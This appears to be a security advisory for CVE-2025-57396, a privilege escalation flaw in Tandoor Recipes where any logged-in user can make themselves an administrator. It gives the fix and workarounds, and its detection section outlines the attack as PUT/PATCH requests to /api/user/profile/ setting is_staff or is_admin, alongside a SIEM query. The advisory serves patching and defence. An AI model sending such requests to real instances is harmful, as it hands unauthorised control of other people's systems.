CVE-2025-57396
📋 TL;DR
CVE-2025-57396 is a privilege escalation vulnerability in Tandoor Recipes where any authenticated user can modify their profile to gain administrative privileges. This affects all users of Tandoor Recipes 2.0.0-alpha-1. The vulnerability stems from improper access controls in the User Profile API Endpoint.
💻 Affected Systems
- Tandoor Recipes
📦 What is this software?
Recipes by Tandoor
⚠️ Risk & Real-World Impact
Worst Case
Any authenticated user becomes a full administrator, gaining complete control over the Tandoor Recipes instance including user management, data modification, and potential system access.
Likely Case
Malicious users or compromised accounts escalate privileges to access sensitive recipe data, modify user permissions, or disrupt service operations.
If Mitigated
With proper network segmentation and monitoring, impact is limited to the Tandoor Recipes application only, with quick detection of privilege changes.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward via API calls to modify user profile boolean flags.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.0.0-alpha-2
Vendor Advisory: https://m10x.de/posts/2025/08/continuous-checks-are-important-privilege-escalation-in-tandoor-recipes/
Restart Required: No
Instructions:
1. Backup your Tandoor Recipes data. 2. Update to version 2.0.0-alpha-2 or later. 3. Verify the update completed successfully. 4. Monitor for any unauthorized privilege changes.
🔧 Temporary Workarounds
Disable User Profile API
allTemporarily disable or restrict access to the vulnerable User Profile API endpoint
Network Access Control
allRestrict network access to Tandoor Recipes to trusted users only
🧯 If You Can't Patch
- Implement strict user access controls and monitor for privilege escalation attempts
- Isolate the Tandoor Recipes instance from other critical systems
🔍 How to Verify
Check if Vulnerable:
Check if running Tandoor Recipes version 2.0.0-alpha-1. Attempt to modify user profile via API to set staff/admin flags.Check Version:
Check Tandoor Recipes web interface or configuration files for version informationVerify Fix Applied:
After updating, verify version is 2.0.0-alpha-2 or later. Test that user profile modifications no longer allow privilege escalation.📡 Detection & Monitoring
Log Indicators:
- Unexpected user privilege changes
- API calls to user profile endpoint with privilege modifications
- Users gaining administrative access without proper authorization
Network Indicators:
- API requests to /api/user/profile/ with PUT/PATCH methods modifying is_staff or is_admin fields
SIEM Query:
source="tandoor" AND (event="user_privilege_change" OR api_endpoint="/api/user/profile/")